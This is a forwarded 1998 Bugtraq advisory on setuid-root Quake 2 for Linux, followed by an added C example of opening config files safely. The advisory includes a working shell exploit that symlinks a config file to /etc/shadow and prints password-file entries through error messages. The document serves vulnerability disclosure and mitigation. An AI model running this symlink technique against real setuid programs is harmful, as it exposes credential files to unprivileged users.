Jeff Uphoff
1998-Feb-25 20:43 UTC
Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files [Forwarded e-mail from kevingeo@CRUZIO.COM]
------- start of forwarded message (RFC 934 encapsulation) -------
From: kevingeo@CRUZIO.COM
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
To: BUGTRAQ@NETSPACE.ORG
Subject: Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files
Date: Wed, 25 Feb 1998 05:49:58 -0500
Reply-To: kevingeo@CRUZIO.COM

Vulnerable:
Everyone who followed the installation instructions and made Quake2 setuid root.

Exploit:
Quake2 reads its conf files (and .pak files) before giving up root, and it doesn't check the permissions beforehand.

nop@chrome:~> id
uid=501(nop) gid=100(users) groups=100(users)
nop@chrome:~> mkdir baseq2
nop@chrome:~> ln -s /etc/shadow baseq2/config.cfg
nop@chrome:~> ls -l /usr/games/quake/quake2
- -rws--x--x 1 root root 303444 Feb 24 19:07 /usr/games/quake/quake2
nop@chrome:~> /usr/games/quake/quake2
couldn't exec default.cfg
execing config.cfg
Unknown command "root:[snip]:10137:0:99999:7:::"
Unknown command "bin:*:9977:0:99999:7:::"
Unknown command "daemon:*:9977:0:99999:7:::"
Unknown command "adm:*:9977:0:99999:7:::"
Unknown command "lp:*:9977:0:99999:7:::"
[etc]
------- end -------
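
One way a setuid program can avoid the behaviour shown in the forwarded message, given here as an added example (not code from the advisory or from Quake2): open user-supplied files under the invoking user's uid and refuse a symlink in the final path component. The names open_as_invoker and selfcheck, and the file names used in the self-check, are hypothetical.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a user-supplied config file with the invoking user's rights (hypothetical helper). */
int open_as_invoker(const char *path)
{
    uid_t saved_euid = geteuid();
    struct stat st;
    int fd, err;
    /* Make the kernel check permissions against the real uid, not root. */
    if (seteuid(getuid()) != 0)
        return -1;
    /* O_NOFOLLOW: fail (ELOOP on Linux) if the last component is a symlink.
     * O_NONBLOCK: do not hang if the path names a FIFO. */
    fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    err = errno;
    /* Regain the saved euid; abort rather than run on in an unknown state. */
    if (seteuid(saved_euid) != 0) abort();
    if (fd < 0) { errno = err; return -1; }
    /* Inspect the object actually opened: accept regular files only. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd); errno = EACCES; return -1;
    }
    return fd;
}

/* Constructed self-check: a plain file opens, a symlink to it is refused. */
int selfcheck(void)
{
    char dir[] = "/tmp/cfgdemoXXXXXX", file[64], lnk[64];
    int fd, ok;
    if (!mkdtemp(dir)) return 0;
    snprintf(file, sizeof file, "%s/real.cfg", dir);
    snprintf(lnk, sizeof lnk, "%s/config.cfg", dir);
    fd = open(file, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || symlink(file, lnk) != 0) return 0;
    close(fd);
    fd = open_as_invoker(file);
    ok = fd >= 0 && open_as_invoker(lnk) == -1 && errno == ELOOP;
    if (fd >= 0) close(fd);
    unlink(lnk); unlink(file); rmdir(dir);
    return ok;
}

int main(void) { return selfcheck() ? 0 : 1; }
```

O_NOFOLLOW only covers the last path component, so the switch to the real uid is what stops a symlinked directory from reaching a root-only file. A binary that is also setgid would need the same treatment for its group id.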